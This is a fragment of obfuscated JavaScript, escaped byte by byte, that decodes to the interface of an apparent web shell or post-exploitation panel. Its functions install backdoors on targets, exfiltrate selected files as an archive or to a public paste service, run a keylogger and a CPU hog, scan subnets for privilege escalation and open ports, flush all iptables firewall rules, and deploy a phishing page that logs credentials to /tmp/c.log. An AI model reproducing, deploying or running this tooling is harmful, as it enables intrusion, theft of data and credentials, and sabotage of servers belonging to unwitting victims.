\x27\x3c\x70\76\111\156\146\x65\x63\x74\151\x6e\147\56\x2e\56\74\57\x70\x3e\47\x3b\xa\x9\11\11\x63\x6f\156\163\x74\40\162\x65\163\40\75\x20\x61\x77\141\151\164\x20\164\150\x69\163\x2e\141\160\x69\x28\47\142\x61\x63\153\144\x6f\x6f\162\137\151\156\x73\x74\141\154\154\x65\x72\47\54\40\x7b\x20\x74\141\162\x67\145\x74\163\x20\x7d\x29\73\xa\x9\x9\x9\x69\146\40\50\x72\145\x73\x20\46\x26\x20\x72\145\163\x2e\163\x74\141\x74\165\163\x20\75\x3d\75\40\x27\163\165\x63\x63\x65\163\163\x27\51\40\x7b\40\154\x65\164\40\x68\x74\x6d\x6c\40\75\x20\47\74\165\154\x3e\x27\x3b\x20\x66\157\162\x20\50\x63\157\156\x73\164\40\133\x66\x69\154\x65\x2c\40\162\x65\x73\x75\154\164\135\40\157\146\40\x4f\x62\x6a\x65\x63\x74\56\x65\x6e\164\x72\151\x65\x73\50\162\x65\x73\56\162\145\163\165\154\164\x73\51\51\x20\173\40\x68\x74\x6d\154\40\x2b\75\x20\x60\74\154\151\76\44\173\x66\x69\154\145\175\72\40\74\x73\160\141\x6e\40\x73\164\171\154\x65\75\x22\x63\x6f\154\157\162\72\44\x7b\162\x65\x73\165\154\164\x20\75\75\75\x20\x27\123\165\x63\x63\x65\x73\163\x27\x20\77\40\47\x76\x61\162\x28\x2d\x2d\x61\143\x63\145\156\164\55\147\162\145\x65\156\51\x27\x20\x3a\40\47\x76\141\162\x28\x2d\55\141\x63\143\x65\x6e\164\55\x72\x65\144\x29\47\x7d\42\x3e\44\173\x72\145\163\x75\x6c\164\x7d\74\x2f\x73\x70\x61\x6e\x3e\74\57\154\151\76\x60\x3b\x20\x7d\40\150\164\x6d\154\40\x2b\75\x20\x27\74\x2f\x75\x6c\76\47\x3b\x20\162\145\x73\165\154\164\x73\105\x6c\x2e\151\156\x6e\x65\162\x48\124\x4d\114\x20\75\x20\x68\x74\155\154\73\40\175\xa\x9\x9\x7d\54\12\x9\11\141\x73\x79\x6e\143\x20\x72\165\156\105\170\146\x69\x6c\50\51\40\x7b\xa\x9\11\x9\x63\157\x6e\x73\x74\x20\x73\x65\x6c\145\143\x74\145\x64\111\164\145\x6d\x73\x20\x3d\40\x41\x72\162\x61\x79\56\x66\x72\157\155\x28\x64\x6f\143\165\155\145\156\x74\x2e\161\x75\145\162\x79\123\x65\x6c\145\x63\x74\157\162\x41\x6c\154\50\47\43\145\x78\x66\151\x6c\x2d\x64\151\x72\55\x74\x72\145\x65\x20\x69\156\x70\165\x74\72\x63\150\x65\x63\153\145\x64\47\x29\51\56\x6d\x61\x70\x28\143\142\x20\75\76\x20\x63\x62\56\166\141\154\165\x65\51\73\x20\151\x66\x20\x28\163\145\x6c\x65\x63\x74\145\144\111\164\145\155\x73\56\154\x65\156\147\164\150\x20\x3d\x3d\75\40\x30\x29\x20\162\x65\164\165\x72\156\40\164\150\x69\x73\56\x74\157\141\x73\x74\x28\47\x50\x6c\145\x61\163\145\x20\163\x65\x6c\145\143\x74\40\141\164\40\154\x65\x61\x73\164\x20\x6f\156\145\40\x66\x69\154\x65\x20\157\x72\40\144\151\162\x65\x63\x74\x6f\162\171\x2e\x27\x2c\40\x27\145\x72\x72\x6f\162\x27\x29\73\12\x9\x9\x9\x63\157\156\163\164\40\162\x65\163\165\154\x74\x73\105\154\x20\x3d\40\144\157\143\x75\155\x65\x6e\164\x2e\x67\145\164\x45\x6c\x65\155\145\156\x74\x42\171\111\144\x28\x27\145\x78\146\151\x6c\55\x72\145\163\x75\154\164\x73\x27\x29\73\40\162\145\x73\x75\154\x74\163\105\154\x2e\x69\x6e\x6e\145\x72\x48\124\115\x4c\40\x3d\x20\47\74\160\76\x50\x61\x63\x6b\x61\147\x69\x6e\x67\x20\x66\151\x6c\145\x73\56\56\x2e\74\57\160\x3e\x27\x3b\40\164\x68\x69\163\x2e\164\x6f\141\x73\164\50\47\103\162\145\141\x74\151\156\x67\x20\141\x72\x63\150\x69\x76\x65\56\56\56\47\51\73\xa\11\x9\x9\143\x6f\156\x73\x74\40\162\145\163\x20\x3d\x20\x61\167\x61\151\164\40\164\x68\x69\163\x2e\141\160\151\x28\x27\x65\170\146\151\x6c\137\144\x61\164\x61\x27\54\40\173\40\151\164\x65\x6d\163\x3a\x20\x4a\123\x4f\116\56\x73\164\162\151\x6e\147\x69\x66\x79\x28\x73\x65\x6c\x65\x63\164\145\144\111\164\145\x6d\163\51\40\175\51\x3b\xa\x9\x9\x9\x69\x66\40\x28\162\145\x73\x20\x26\x26\40\x72\x65\163\56\x73\164\141\164\x75\x73\40\x3d\75\x3d\40\47\x73\x75\143\143\145\x73\x73\x27\x29\x20\x7b\40\x72\145\x73\165\x6c\x74\x73\105\154\x2e\151\156\156\x65\162\x48\124\x4d\114\40\75\x20\140\x3c\x70\x20\163\x74\x79\154\x65\75\42\143\x6f\154\157\x72\72\x76\141\162\50\55\x2d\141\143\x63\145\x6e\x74\x2d\x67\x72\145\x65\x6e\x29\73\42\76\101\x72\143\150\151\166\145\x20\x72\145\141\144\x79\41\40\74\141\40\150\x72\x65\146\75\x22\44\x7b\x72\145\x73\x2e\x64\157\x77\156\x6c\x6f\141\x64\137\165\162\x6c\175\42\x20\163\x74\171\x6c\x65\x3d\x22\x63\157\x6c\157\x72\72\166\x61\x72\50\x2d\55\x61\x63\143\145\x6e\x74\55\142\x6c\165\x65\51\73\42\x3e\103\154\x69\143\153\40\x68\145\x72\x65\x20\x74\x6f\x20\x64\157\x77\156\154\157\141\144\56\74\x2f\x61\76\74\x2f\x70\x3e\x3c\x70\40\x73\x74\171\154\145\75\x22\x63\157\154\x6f\x72\x3a\166\x61\x72\x28\x2d\55\x74\x65\x78\164\55\155\x65\144\x29\73\x20\146\157\156\164\55\163\x69\x7a\145\x3a\x20\60\56\70\162\145\x6d\73\x22\76\114\x69\x6e\153\x20\151\x73\x20\166\x61\154\151\144\40\x66\157\162\40\x6f\156\145\40\144\157\x77\156\x6c\157\141\x64\x20\x61\x6e\144\40\167\151\x6c\154\40\x65\x78\x70\x69\162\x65\x2e\x3c\57\x70\76\140\73\x20\x7d\x20\145\x6c\x73\x65\40\173\40\x72\145\163\x75\x6c\x74\x73\x45\154\56\x69\x6e\x6e\145\162\110\124\115\114\40\75\40\47\74\160\x20\163\164\x79\x6c\x65\x3d\42\x63\157\x6c\x6f\162\x3a\166\141\162\x28\55\55\x61\x63\143\x65\156\x74\55\x72\x65\x64\51\73\x22\x3e\x46\141\x69\154\x65\144\x20\x74\157\x20\143\162\145\x61\164\x65\40\x61\x72\x63\x68\x69\166\145\x2e\74\57\x70\x3e\47\73\40\175\12\x9\x9\175\54\12\x9\x9\x61\163\171\156\x63\40\x65\x78\146\x69\154\126\x69\x61\120\x61\x73\164\x65\50\160\141\164\150\51\x20\173\40\143\x6f\156\163\x74\40\x63\x6f\156\146\x69\162\155\145\x64\40\75\40\141\167\x61\151\x74\40\x74\x68\x69\x73\56\x73\150\x6f\x77\103\x6f\x6e\x66\151\x72\x6d\115\x6f\x64\141\154\x28\x60\124\x68\x69\163\x20\167\x69\154\154\40\x75\x70\x6c\x6f\141\144\x20\x74\x68\x65\40\143\x6f\x6e\164\145\x6e\x74\x20\x6f\146\40\x3c\x73\164\162\157\x6e\x67\x3e\x22\x24\x7b\160\x61\x74\150\x2e\x73\x70\x6c\x69\x74\50\x27\x2f\x27\51\56\x70\x6f\x70\x28\51\x7d\x22\74\x2f\x73\164\162\157\156\147\x3e\x20\x74\x6f\40\141\x20\x70\165\x62\x6c\151\x63\x20\160\141\x73\164\x69\156\x67\x20\x73\x65\162\166\x69\x63\x65\x2e\40\103\157\156\164\x69\x6e\x75\145\77\140\54\40\173\x20\x74\171\160\x65\72\x20\47\x77\x61\162\x6e\x69\x6e\x67\x27\40\x7d\51\x3b\x20\151\146\40\x28\x21\143\x6f\156\x66\151\162\x6d\145\144\51\40\x72\145\x74\165\162\156\73\x20\x74\150\x69\x73\x2e\x74\x6f\x61\163\164\x28\140\105\170\x66\151\x6c\x74\162\141\164\151\156\x67\x20\44\173\x70\x61\x74\150\x2e\163\x70\x6c\x69\x74\50\47\x2f\x27\51\x2e\x70\x6f\x70\50\51\175\56\x2e\x2e\140\x29\73\x20\x63\x6f\x6e\x73\164\40\x72\x65\x73\40\75\x20\141\167\x61\x69\164\x20\164\x68\151\x73\56\x61\x70\151\50\x27\x65\170\146\x69\x6c\137\x70\x61\x73\x74\x65\x27\54\x20\173\40\x70\141\164\x68\40\x7d\51\73\40\x69\x66\x20\x28\x72\145\x73\x20\x26\x26\x20\162\145\x73\56\163\164\x61\x74\x75\163\40\75\75\75\40\47\x73\165\x63\143\145\x73\x73\47\x29\x20\x7b\40\x61\x77\x61\x69\x74\40\164\150\x69\163\x2e\163\x68\157\x77\111\x6e\160\x75\x74\x4d\157\144\141\154\50\42\105\x78\x66\x69\154\x74\162\x61\x74\x69\157\156\x20\163\165\143\x63\x65\163\163\x66\x75\x6c\x21\x20\120\x61\x73\x74\x65\x20\x55\122\x4c\x3a\x22\54\x20\162\145\x73\x2e\x75\162\154\54\x20\173\x20\164\x69\x74\154\x65\x3a\40\47\342\x9c\205\40\x45\x78\x66\x69\x6c\x74\x72\x61\x74\x69\157\156\x20\103\x6f\155\x70\154\145\164\x65\x27\x2c\40\x69\143\157\156\x3a\40\x27\xe2\234\x85\x27\x2c\40\160\154\141\x63\x65\x68\x6f\154\144\145\x72\x3a\x20\x27\120\141\x73\x74\145\40\125\x52\114\56\56\56\x27\x20\x7d\51\73\x20\x7d\40\x7d\x2c\12\11\11\141\x73\x79\156\x63\40\x72\165\156\x43\x70\165\110\157\x67\x28\51\x20\x7b\40\x63\157\x6e\x73\164\40\144\165\162\141\164\x69\x6f\x6e\x20\x3d\40\x64\157\x63\165\155\145\x6e\x74\56\147\145\164\105\x6c\145\x6d\145\x6e\164\x42\171\x49\144\x28\x27\x68\x6f\147\x2d\144\165\x72\141\x74\151\x6f\156\x27\x29\56\166\141\x6c\165\145\x3b\x20\164\150\151\163\x2e\164\157\141\x73\164\x28\x60\x52\x75\156\156\151\156\147\x20\103\120\x55\40\x68\x6f\x67\40\x66\x6f\162\x20\44\173\x64\165\162\141\x74\151\157\156\x7d\40\163\145\143\157\x6e\144\x73\56\x2e\x2e\x60\54\x20\x27\163\165\143\x63\x65\x73\x73\47\51\73\40\143\x6f\x6e\163\164\x20\x72\x65\163\x20\75\40\x61\167\x61\x69\x74\40\164\x68\x69\x73\x2e\141\160\x69\x28\47\x63\x70\165\x5f\150\157\x67\x27\54\x20\x7b\x20\144\x75\162\x61\x74\x69\157\156\x20\x7d\51\x3b\40\x69\146\50\162\145\163\51\x20\x74\x68\151\163\x2e\164\x6f\141\163\164\50\162\x65\163\56\x6d\145\163\x73\x61\147\145\54\x20\162\145\x73\x2e\163\164\141\164\x75\163\x29\x3b\x20\x7d\x2c\12\11\11\141\163\x79\156\143\x20\x72\x75\x6e\x4b\x65\x79\x6c\x6f\147\x67\x65\162\x28\51\40\x7b\x20\x63\157\156\x73\x74\40\x70\x69\144\40\x3d\x20\x64\157\x63\x75\x6d\145\x6e\164\56\x67\145\x74\x45\154\145\x6d\145\x6e\x74\102\x79\111\x64\x28\47\153\145\171\x6c\x6f\147\x67\x65\162\x2d\160\151\144\47\51\56\166\141\154\165\145\73\x20\151\x66\x28\41\x70\151\x64\51\x20\162\x65\x74\x75\162\156\40\x74\x68\x69\x73\56\x74\157\141\x73\164\50\47\x50\111\104\x20\x69\163\x20\162\145\161\165\151\162\145\x64\x2e\x27\54\40\x27\145\162\162\x6f\162\47\51\x3b\40\x63\x6f\156\x73\164\x20\x6f\165\x74\160\165\x74\105\x6c\40\x3d\40\144\x6f\x63\165\x6d\x65\156\164\x2e\147\145\x74\x45\154\145\x6d\145\x6e\164\102\x79\x49\144\50\47\x6b\145\171\x6c\x6f\147\147\x65\162\x2d\x6f\165\164\160\x75\164\x27\51\73\x20\157\x75\x74\160\x75\164\105\x6c\56\x69\156\x6e\145\x72\124\145\x78\x74\x20\x3d\40\140\101\164\x74\141\143\x68\151\x6e\147\40\x74\x6f\x20\x50\111\104\x20\44\x7b\160\151\x64\175\56\56\x2e\x60\x3b\40\x63\x6f\x6e\x73\164\40\x72\x65\163\x20\x3d\x20\141\167\141\x69\164\40\164\150\x69\x73\x2e\141\x70\x69\x28\x27\153\145\x79\154\157\x67\x67\145\x72\47\54\x20\173\x20\160\x69\x64\40\x7d\x29\x3b\40\x69\146\x28\x72\145\x73\40\46\x26\40\x72\145\163\x2e\x73\164\141\164\x75\x73\x20\x3d\x3d\x3d\40\x27\163\x75\x63\143\x65\x73\x73\x27\51\x20\x6f\x75\164\160\x75\x74\105\x6c\56\x69\156\x6e\x65\162\x48\x54\x4d\114\x20\x3d\40\162\145\x73\56\x64\141\x74\x61\73\x20\145\154\163\145\x20\151\x66\40\50\162\x65\163\51\x20\157\165\x74\160\x75\164\x45\154\56\x69\156\156\145\162\124\x65\x78\164\x20\x3d\x20\162\145\163\x2e\155\x65\163\163\141\x67\x65\x3b\x20\x7d\x2c\12\x9\x9\x61\x73\171\156\143\40\162\x75\156\x50\x72\x69\x76\x65\x73\143\103\150\145\x63\153\x65\162\x28\51\x20\173\40\143\157\156\x73\164\40\x6f\x73\40\75\x20\x64\x6f\143\x75\155\145\x6e\164\56\147\x65\x74\105\154\145\x6d\145\156\x74\x42\171\x49\x64\50\47\160\x72\x69\x76\145\163\x63\55\157\x73\x2d\164\x79\160\x65\x27\x29\56\x76\141\154\x75\x65\x3b\40\x63\x6f\156\x73\x74\40\157\x75\164\160\165\164\x45\154\40\x3d\x20\x64\157\143\x75\155\x65\156\164\x2e\147\x65\x74\105\x6c\145\155\145\156\x74\x42\171\x49\x64\x28\x27\160\x72\151\166\x65\163\143\55\143\x68\x65\x63\153\x65\162\55\157\x75\x74\160\165\164\47\51\73\x20\x6f\x75\x74\x70\x75\x74\x45\x6c\x2e\x69\156\156\145\162\x54\x65\x78\164\x20\75\40\x27\123\164\141\162\164\151\x6e\x67\x20\x70\162\x69\166\151\154\x65\x67\145\x20\x65\163\x63\x61\x6c\x61\164\x69\x6f\156\40\163\x63\141\x6e\x2e\56\x2e\40\124\150\151\163\40\155\x61\171\x20\x74\141\x6b\x65\x20\163\145\x76\x65\x72\141\x6c\x20\155\x69\156\165\x74\x65\x73\x2e\47\x3b\x20\164\x68\x69\163\56\x74\157\141\163\164\x28\x27\123\164\x61\x72\x74\x69\x6e\147\x20\x50\x72\x69\x76\105\163\143\x20\x73\143\141\x6e\56\x2e\x2e\47\51\x3b\x20\x63\157\x6e\163\164\x20\x72\x65\x73\40\x3d\x20\x61\x77\141\151\164\40\x74\x68\151\163\x2e\x61\x70\151\x28\x27\x70\x72\151\166\x65\163\143\137\143\x68\x65\143\x6b\145\x72\x27\x2c\x20\x7b\x20\157\163\x20\x7d\x29\73\40\x69\x66\40\50\162\145\x73\40\x26\x26\x20\162\x65\x73\56\x73\x74\x61\164\x75\163\x20\75\75\x3d\x20\x27\163\x75\x63\143\145\x73\163\x27\51\x20\x7b\x20\x6f\x75\x74\160\165\164\105\x6c\56\151\156\156\145\162\110\124\115\114\40\x3d\x20\162\145\163\x2e\144\x61\164\141\73\40\x74\x68\151\163\x2e\164\x6f\x61\163\164\x28\47\120\162\151\166\105\163\143\x20\163\x63\141\156\40\x63\x6f\155\x70\154\145\x74\x65\56\47\x29\73\x20\175\40\x7d\x2c\12\x9\11\x61\x73\x79\x6e\143\40\x72\x75\x6e\123\x75\142\x6e\145\x74\x53\143\x61\156\156\145\x72\x28\51\40\x7b\x20\x63\157\156\163\x74\40\163\x75\x62\156\x65\164\40\75\x20\144\x6f\x63\165\x6d\x65\x6e\164\x2e\x67\145\164\x45\x6c\x65\155\145\x6e\x74\102\x79\x49\x64\x28\x27\x73\x75\142\x6e\x65\x74\55\x73\x63\141\156\55\x74\x61\162\147\145\164\47\x29\x2e\166\141\x6c\165\145\73\x20\x69\146\40\x28\41\x73\x75\x62\x6e\x65\x74\x29\40\162\x65\x74\165\162\x6e\x20\164\150\x69\x73\56\x74\x6f\141\x73\164\x28\47\x53\x75\x62\x6e\x65\x74\40\x69\163\x20\162\x65\161\x75\151\x72\x65\144\x2e\47\x2c\x20\x27\x65\x72\162\157\162\47\51\x3b\x20\x63\157\x6e\163\x74\40\157\165\x74\x70\165\164\105\x6c\40\x3d\40\144\x6f\143\x75\x6d\x65\156\x74\x2e\147\145\164\105\x6c\145\155\145\156\164\102\x79\111\x64\50\x27\x73\x75\x62\x6e\145\164\55\x73\143\141\x6e\55\x6f\x75\x74\160\165\164\x27\x29\73\40\x6f\165\164\160\165\164\x45\x6c\56\151\156\x6e\145\162\124\145\x78\x74\40\75\x20\x60\123\x63\x61\x6e\156\x69\x6e\147\40\x24\173\163\x75\x62\156\145\x74\175\56\x2e\56\40\x54\150\151\x73\40\x63\157\165\x6c\144\40\x74\x61\x6b\x65\x20\141\40\167\x68\x69\154\145\56\x60\73\x20\x74\150\x69\163\x2e\x74\157\141\x73\164\50\x60\x53\143\141\156\x6e\x69\156\147\x20\x24\173\163\x75\142\x6e\145\164\175\56\56\x2e\x60\51\73\40\143\x6f\x6e\x73\x74\40\x72\145\x73\x20\x3d\x20\x61\167\x61\151\x74\x20\x74\150\151\163\56\x61\160\x69\x28\47\x73\165\x62\156\x65\x74\137\x73\x63\x61\x6e\156\145\x72\47\x2c\x20\x7b\40\x73\x75\142\156\145\x74\x20\x7d\51\x3b\40\x69\x66\40\x28\x72\145\163\40\46\46\x20\162\x65\163\56\163\164\141\x74\x75\x73\40\x3d\x3d\x3d\x20\47\x73\x75\143\x63\x65\163\163\47\51\x20\173\40\x6c\145\164\40\164\x65\170\164\x20\75\40\140\x53\143\x61\x6e\40\162\145\x73\165\x6c\x74\163\x20\146\157\162\x20\44\x7b\x73\165\142\156\145\x74\x7d\72\134\x6e\x5c\x6e\140\73\40\151\146\40\50\x4f\142\152\145\x63\164\56\x6b\145\171\x73\x28\162\145\x73\x2e\x72\145\x73\165\154\164\163\51\56\x6c\145\156\147\164\150\40\x3e\x20\x30\x29\40\173\x20\146\157\x72\40\50\x63\x6f\156\163\164\x20\x5b\151\160\54\40\x70\x6f\x72\164\163\135\40\x6f\x66\40\x4f\x62\152\x65\x63\164\x2e\145\156\164\162\151\x65\x73\x28\162\x65\163\x2e\x72\145\x73\x75\x6c\164\x73\51\51\40\173\40\x74\145\170\164\40\53\75\40\x60\44\x7b\x69\160\x7d\134\164\117\x50\105\116\x3a\40\44\173\x70\x6f\162\164\163\x2e\152\x6f\x69\156\x28\x27\54\40\x27\x29\175\134\156\x60\x3b\40\175\x20\175\x20\x65\154\163\x65\40\173\x20\x74\145\x78\x74\40\53\75\40\x27\116\x6f\x20\154\151\166\145\40\150\157\163\x74\163\40\x77\x69\164\150\x20\x6f\x70\x65\156\40\160\157\x72\164\163\40\146\157\x75\x6e\x64\x2e\47\x3b\40\x7d\x20\157\165\x74\160\165\x74\105\x6c\x2e\151\156\156\145\x72\124\145\170\x74\x20\75\x20\x74\x65\170\x74\73\x20\164\150\x69\163\x2e\x74\x6f\141\163\x74\50\x27\123\x75\142\156\145\x74\x20\163\x63\x61\x6e\40\143\157\x6d\x70\154\x65\164\x65\x2e\47\x29\x3b\x20\175\40\175\54\xa\11\x9\141\x73\171\156\143\40\x76\x69\x65\167\x46\151\162\x65\167\x61\x6c\x6c\x52\x75\x6c\145\163\50\x29\40\x7b\40\x63\x6f\156\x73\164\x20\157\x75\x74\x70\165\164\105\154\x20\75\x20\x64\157\x63\165\155\145\156\164\56\x67\x65\164\105\154\x65\155\x65\x6e\164\102\171\111\x64\50\47\146\151\162\x65\167\141\154\154\55\157\x75\x74\160\x75\164\47\x29\73\40\x6f\x75\x74\160\165\x74\105\x6c\56\151\x6e\156\145\162\124\145\x78\164\x20\75\x20\x27\x46\145\164\x63\150\x69\156\x67\40\146\x69\162\x65\x77\141\154\x6c\x20\162\165\x6c\145\163\56\56\x2e\47\x3b\x20\143\157\x6e\x73\164\x20\x72\145\163\40\x3d\40\141\x77\x61\151\x74\x20\x74\x68\x69\x73\56\x61\160\x69\50\47\x66\x69\162\145\167\x61\154\154\x5f\x63\157\156\x74\162\157\x6c\47\x2c\40\x7b\x20\x73\165\x62\137\x61\143\x74\151\157\x6e\72\x20\x27\147\145\164\47\x20\175\x29\x3b\x20\151\146\40\50\162\145\x73\40\46\x26\40\162\145\163\x2e\163\164\x61\x74\165\163\40\x3d\75\x3d\x20\47\x73\165\x63\143\x65\163\163\x27\51\x20\157\165\164\x70\x75\164\x45\154\56\x69\156\x6e\145\x72\x48\124\115\114\40\75\x20\x72\x65\x73\x2e\x64\x61\164\x61\73\x20\x7d\54\12\x9\x9\x61\x73\x79\x6e\x63\x20\146\x6c\x75\163\150\106\x69\162\x65\x77\141\154\154\x52\165\154\145\163\50\x29\x20\173\x20\x63\157\x6e\163\x74\x20\x63\x6f\x6e\x66\x69\x72\x6d\x65\144\x20\x3d\40\141\x77\141\x69\164\40\164\150\x69\163\x2e\x73\150\157\167\x43\157\x6e\x66\x69\x72\155\115\x6f\x64\x61\154\x28\x27\104\x41\116\107\105\122\72\x20\x54\150\x69\163\40\167\151\x6c\x6c\x20\141\x74\x74\145\x6d\x70\x74\40\164\157\40\x66\x6c\165\x73\x68\40\x61\154\154\40\151\160\x74\x61\x62\x6c\x65\x73\x20\146\151\162\145\167\141\x6c\x6c\40\162\165\154\145\x73\56\40\x54\x68\151\x73\40\x63\157\165\x6c\x64\x20\145\x78\160\x6f\163\x65\40\x74\150\145\40\x73\145\x72\166\x65\162\40\x61\156\x64\x20\151\163\40\x61\x20\154\157\x75\x64\40\141\143\164\x69\x6f\156\56\x20\101\x72\x65\x20\x79\157\165\x20\163\165\162\x65\x3f\47\54\x20\173\x20\x74\171\160\x65\72\x20\x27\x64\x61\x6e\x67\145\x72\x27\54\40\157\x6b\124\x65\170\164\x3a\x20\47\106\154\165\x73\150\x20\x52\165\x6c\145\163\47\54\x20\143\x61\156\x63\x65\x6c\124\x65\170\164\x3a\40\47\103\x61\156\143\145\x6c\47\40\175\51\73\x20\x69\x66\x20\x28\143\x6f\x6e\146\x69\x72\x6d\x65\x64\51\40\173\x20\x63\157\156\x73\x74\x20\157\x75\164\160\165\164\105\154\x20\x3d\x20\x64\157\x63\x75\x6d\x65\156\x74\x2e\x67\145\164\105\x6c\145\155\145\x6e\164\102\x79\x49\144\x28\47\x66\x69\162\x65\x77\141\154\154\55\x6f\x75\x74\160\x75\x74\x27\51\x3b\x20\x6f\165\164\x70\165\x74\x45\x6c\56\x69\x6e\x6e\145\162\124\x65\170\164\x20\x3d\x20\x27\x53\x65\x6e\x64\151\156\x67\40\146\x6c\165\x73\150\40\x63\x6f\x6d\x6d\141\156\144\56\56\56\x27\73\40\x63\x6f\x6e\x73\x74\40\162\145\163\x20\x3d\40\x61\x77\x61\x69\164\x20\164\150\x69\x73\56\141\160\151\x28\47\x66\151\x72\145\x77\141\x6c\x6c\x5f\x63\x6f\156\x74\x72\157\x6c\x27\x2c\40\x7b\x20\163\165\142\137\x61\143\164\x69\157\156\72\40\x27\146\x6c\x75\163\150\x27\x20\x7d\51\73\40\x69\x66\40\x28\162\145\x73\x20\46\x26\40\x72\145\163\56\163\164\141\x74\x75\x73\40\75\75\x3d\40\x27\163\x75\143\143\145\x73\163\47\51\40\173\x20\x6f\165\x74\160\165\x74\x45\154\x2e\151\x6e\x6e\x65\162\x48\x54\x4d\114\x20\75\40\x72\x65\163\56\144\141\164\x61\x3b\x20\164\150\151\x73\56\x74\157\141\163\x74\50\47\106\x6c\165\x73\x68\40\143\157\155\x6d\141\156\144\40\163\145\156\x74\x2e\40\103\150\145\x63\153\40\x72\x75\154\145\x73\x20\141\147\x61\151\156\x20\164\x6f\40\x63\157\x6e\146\x69\x72\x6d\56\x27\x29\73\x20\175\40\175\40\x7d\x2c\12\11\11\x61\x73\171\156\143\x20\x64\x65\160\154\157\171\x50\150\151\163\150\151\156\147\120\141\x67\x65\50\51\40\x7b\40\x63\x6f\156\163\164\40\x70\x61\x74\150\40\x3d\40\144\x6f\143\x75\155\x65\156\164\x2e\147\145\x74\x45\154\145\x6d\145\156\x74\x42\171\x49\144\x28\x27\x70\150\151\163\150\x2d\144\x65\160\x6c\x6f\x79\55\x70\141\164\150\x27\51\56\166\x61\154\165\145\x2c\x20\146\151\154\145\156\141\155\145\40\x3d\x20\x64\x6f\143\x75\x6d\x65\156\x74\56\x67\x65\x74\x45\154\145\x6d\145\156\164\x42\171\x49\144\x28\x27\x70\x68\x69\163\150\x2d\x64\145\160\154\x6f\x79\55\146\x69\x6c\x65\x6e\141\155\145\x27\51\56\166\141\x6c\165\x65\x2c\40\x6f\165\164\x70\x75\x74\x45\154\x20\x3d\x20\x64\x6f\143\165\x6d\x65\156\x74\56\147\145\164\x45\154\x65\155\x65\x6e\164\102\171\111\x64\x28\x27\x70\150\x69\163\x68\55\144\145\x70\154\157\x79\55\157\165\164\160\x75\x74\x27\x29\x3b\x20\x69\x66\40\50\x21\160\x61\x74\x68\x20\174\x7c\40\x21\x66\151\154\x65\x6e\x61\155\145\x29\x20\x72\145\164\165\162\156\40\164\150\x69\x73\56\x74\157\141\x73\x74\x28\x27\120\141\164\150\40\x61\x6e\144\x20\146\x69\x6c\145\x6e\141\x6d\145\x20\x61\x72\145\40\x72\145\161\165\x69\x72\145\144\56\x27\x2c\40\x27\145\162\162\157\x72\47\51\73\40\x6f\x75\164\x70\165\x74\105\x6c\56\151\x6e\x6e\145\162\110\x54\115\x4c\40\75\x20\x27\74\x70\x3e\x44\x65\x70\154\157\171\151\x6e\x67\x2e\x2e\56\74\57\x70\76\47\73\40\143\x6f\x6e\x73\x74\40\162\145\163\x20\x3d\40\141\167\141\x69\164\x20\x74\x68\x69\x73\56\141\x70\151\x28\47\144\x65\x70\x6c\x6f\171\x5f\160\x68\151\x73\x68\x27\54\x20\x7b\x20\x70\x61\x74\x68\54\x20\146\x69\154\x65\x6e\x61\155\x65\40\175\51\x3b\x20\x69\x66\40\50\162\x65\x73\x20\x26\x26\x20\162\145\x73\56\x73\164\x61\x74\x75\163\x20\75\75\75\40\47\163\165\143\x63\x65\163\x73\x27\x29\x20\x7b\x20\157\x75\x74\160\165\164\105\x6c\x2e\151\156\156\145\162\110\x54\x4d\114\x20\x3d\x20\140\74\x70\x20\163\x74\x79\154\145\75\42\x63\157\154\x6f\162\72\166\x61\162\x28\x2d\55\x61\x63\143\145\x6e\x74\55\x67\x72\x65\x65\156\x29\x3b\x22\x3e\x24\x7b\162\x65\163\56\155\x65\x73\x73\x61\147\x65\x7d\x3c\142\162\x3e\x55\122\x4c\72\x20\x3c\x61\x20\150\162\x65\x66\75\42\x24\173\x72\145\x73\x2e\165\x72\x6c\x7d\x22\x20\x74\141\x72\x67\145\x74\x3d\42\137\142\154\141\156\x6b\x22\x20\163\x74\171\154\x65\x3d\42\x63\x6f\x6c\157\162\x3a\x76\141\x72\50\55\x2d\141\x63\143\145\x6e\x74\x2d\142\x6c\165\x65\x29\x3b\x22\x3e\44\x7b\162\x65\163\x2e\165\x72\154\175\x3c\57\141\76\74\x2f\x70\x3e\x3c\x70\76\x43\x72\145\x64\x65\x6e\x74\x69\x61\154\163\x20\x77\x69\154\154\x20\x62\145\40\154\157\x67\147\x65\144\40\164\x6f\x20\x3c\163\x74\x72\x6f\x6e\x67\76\57\164\155\x70\x2f\x63\x2e\154\157\x67\74\57\x73\164\162\157\x6e\147\76\x20\x6f\156\40\164\150\145\40\x73\x65\162\166\145\x72\56\74\57\160\76\x60\73\x20\x7d\40\x65\154\x73\145\40\173\x20\157\x75\164\160\x75\x74\x45\154\56\x69\156\x6e\145\x72\110\124\x4d\x4c\x20\75\x20\140\x3c\x70\x20\163\x74\171\154\x65\x3d\x22\143\x6f\154\x6f\x72\x3a\166\x61\162\50\x2d\55\141\x63\143\145\156\x74\x2d\162\145\x64\x29\x3b\x22\76\x44\145\x70\x6c\157\171\155\x65\x6e\x74\x20\146\x61\x69\x6c\x65\x64\56\x3c\x2f\160\76\x60\73\40\175\40\175\x2c\xa\x9\11\12\x9\x9\57\57\40\116\157\164\151\146\x69\x63\141\x74\151\x6f\x6e\x20\x43\x65\156\x74\145\x72\xa\x9\11\156\x6f\x74\151\x66\151\143\141\164\151\x6f\x6e\x73\x3a\x20\133\x5d\54\12\11\11\141\x64\x64\116\x6f\164\x69\x66\151\x63\x61\x74\151\157\x6e\x28\164\x69\x74\154\x65\54\x20\x6d\x65\x73\x73\x61\x67\x65\54\40\x74\171\x70\x65\40\75\x20\x27\151\x6e\146\x6f\47\51\40\x7b\12\11\x9\11\x63\x6f\156\x73\x74\x20\156\157\164\x69\146\151\143\x61\x74\x69\x6f\156\40\x3d\40\x7b\40\x69\144\72\x20\104\x61\164\x65\56\156\x6f\x77\x28\x29\54\40\164\x69\x74\x6c\x65\x2c\x20\155\x65\163\163\141\x67\145\x2c\40\x74\171\x70\x65\54\40\x74\x69\x6d\x65\x3a\x20\156\145\167\40\x44\141\164\145\x28\51\x2e\164\157\x4c\x6f\x63\x61\x6c\145\124\151\155\x65\x53\x74\162\151\x6e\x67\50\x29\x20\x7d\x3b\12\11\11\11\164\x68\151\163\x2e\156\x6f\164\x69\146\151\x63\x61\164\x69\157\x6e\163\x2e\165\x6e\163\x68\151\x66\x74\50\156\x6f\164\151\x66\151\143\x61\164\151\x6f\x6e\x29\73\12\11\11\x9\x74\x68\151\x73\56\165\x70\144\x61\x74\145\x4e\157\164\151\x66\x69\143\x61\164\151\x6f\x6e